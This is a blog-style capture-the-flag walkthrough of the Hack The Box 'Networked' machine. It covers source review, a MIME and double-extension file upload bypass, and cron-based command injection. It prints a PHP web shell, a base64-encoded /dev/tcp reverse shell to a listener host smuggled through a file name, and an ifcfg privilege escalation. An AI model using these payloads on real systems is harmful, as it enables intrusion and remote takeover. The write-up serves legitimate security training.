Hi all! In today’s post, we will be going over the Networked machine from Hack The Box which includes some Source Code Review which I enjoy doing so (White Box Approach), so let’s get started!

1)First, kicking off with Nmap scan:

nmap -sC -sV -A -T4 <TARGET_IP>

2)Not much going on, so let’s get straight to the business. Let’s enumerate the website

2.1) The website is pretty basic, with nothing interesting on the home page, so I decided to start with directory and subdomain enumeration:

2.2)For directory busting I was using dirsearch:

dirsearch -u http://networked.htb

2.3)Among all the findings from dirsearch, backup looked the most interesting to me, and by navigating to the /backup, the backup zip file is automatically downloaded.Let’s unzip it:

2.4)Cool, we have some Code to Review, to let’s do it! I will use VS Code, as I like that IDE.

2.4.1)Starting off with the index.html, here we can see an interesting comment that gallery and upload feature are not linked:

2.4.2)Gallery is actually photos.php which is supposed to render the photos from the user upload:

2.4.3)More interesting for me sounds upload, because if it’s not properly secured we can upload malicious PHP executable (since the app’s language is PHP, and thus get a RCE). Let’s enumerate it: Very simple UI wise:

2.4.4)But let’s see what the code has to say:

From here we can see that the first check is about the file type, the function for that is check_file_type which originates from the lib.php. Also from the screenshot below, we can see that uploaded files are ending up in the /uploads folder (important to remember as that way we can see if we can bypass File Upload and execute arbitrary PHP code)

2.4.5)Okay,so we know that the first check is MIME check, let’s see if we have something else to bypass, and we do! File extension is being checked as well:

2.4.6)Okay so far so good. So here is my thought process here:

2.4.6.1)If we upload test.txt that will fail because it’s not either an image nor it has valid extension.

2.4.6.2)If we upload test.txt.jpg that will also fail MIME type check as it’s not an image, but it will satisfy the second check, which is about the file extension. This is also known as double extension bypass.

2.4.6.3)But what if we make use of burp, create a shell.php.png, intercept the request, and smuggle PHP payload in PNG magic bytes, that should bypass this check? This is also known as MIME bypass file upload vulnerability. Let’s see how we can do that.

2.5)Firstly, upload an image of your choice. Then send that request from Burp’s HTTP History to the Repeater: Then feel free to delete a lot of bytes from the middle, but leave some at the beginning and in the end that will enable us to bypass MIME Check, as the server will think that this is regular image. Now, feel free to delete majority of bites from the middle, and there smuggle PHP Payload, in this case I simply used simple PHP web shell:

<?php system($_GET['cmd']); ?>

### Notice how I am using double extension for second check bypass and then I smuggled PHP in the middle, so we bypassed MIME check as well. ###

2.6)Okay, since we know that our uploaded files are ending in the /uploads. Navigate there and pass ?cmd=whoami in the URL bar, we should get a code execution:

2.7)Cool! We see apache being returned in the response, now it’s time to get a reverse shell so we can continue with rooting this Box. After some failed attempts I decided to go with Python Reverse Shell, first checking if Python is installed in order to do so:

2.8)Next, payload, I used revshell.com for this one:

2.9)And bingo, we got a reverse shell:

3)Since I know that Python is installed I will use it to get more stable shell. TTY Shell:

python -c 'import pty; pty.spawn("/bin/bash")'

3.1)Upon some enumeration I found a cron job in Guly’s directory, I also used VS Code as it’s much easier to read through the code that way:

3.2)Okay, so here is what is happening here and why the code snippet is vulnerable to the Command (OS) Injection: First we see that scripts creates an empty array named files, and then make a for loop for each file name in the /upload directory. If the file name is index.html everything is fine, but if not, the script tends to delete it, the problem here is that it’s using exec to do so. The exec is using a user-controlled value which is $value, as we can create any file with any file name inside the uploads directory. With that being said we can create malicious file names, such as this one:

In addition to this, we will need to use Injection Operators, to introduce new OS Commands within the exec command, for that I choose to go with ; character.

So the final file name should be:

evil;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNTU1NSAwPiYxËg=
base64 -d | bash ---> we are decoding our payload and then executing it with bash!

Base64 encoded payload is actually:

"sh -i >& /dev/tcp/10.10.14.30/5555 O>&1"

I had to base64 encode it because characters like / and > won’t be working within the file name:

So the final command will look like this based on the source code:

exec("nohup /bin/rm -f /var/www/html/uploads/evil;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNTU1NSAwPiYxËg=
base64 -d | bash > /dev/null 2>&1 &");

where /var/ww/html/upoads is $path and $value is our malicious file name which is understood from the script as another OS command and it’s successfully executed as an additional command (we kinda break out of the ongoing one). Start netcat listener and we got a shell as Guly, because this cron job is running with his account:

4)Cool, we got user.txt! First check that I always make when going for root.txt is sudo -L, and this time was no exception:

4.1)Okay, another script. Let’s see what it does. Okay, I didn’t get much out of it just by looking at it, nor after the execution, but what I picked up is the location of the cat command –> ifcfg-guly. I decided to do more research on it: Hacktricks got us covered:

4.2)Okay so from here I can see the ifcfg is used for network configuration. Since when I ran changeme.sh I am able to modify ifcfg file which means we pwned the system. Let’s do it!

I simply placed /bin/bash as the NAME and we simply got a shell as root. Very cool privilege escalation path. GG!

Lessons Learned

1)While analyzing the code, I learned some PHP Syntaxes that I didn’t know before while I was trying to reproduce the vulnerabilities, both file upload and command injection locally.

2)Definitely learned about Network files and their format such as ifcfg and if not properly secured can lead to the privilege escalation. Overall great machine!

Leave a Reply

Your email address will not be published. Required fields are marked *

Trending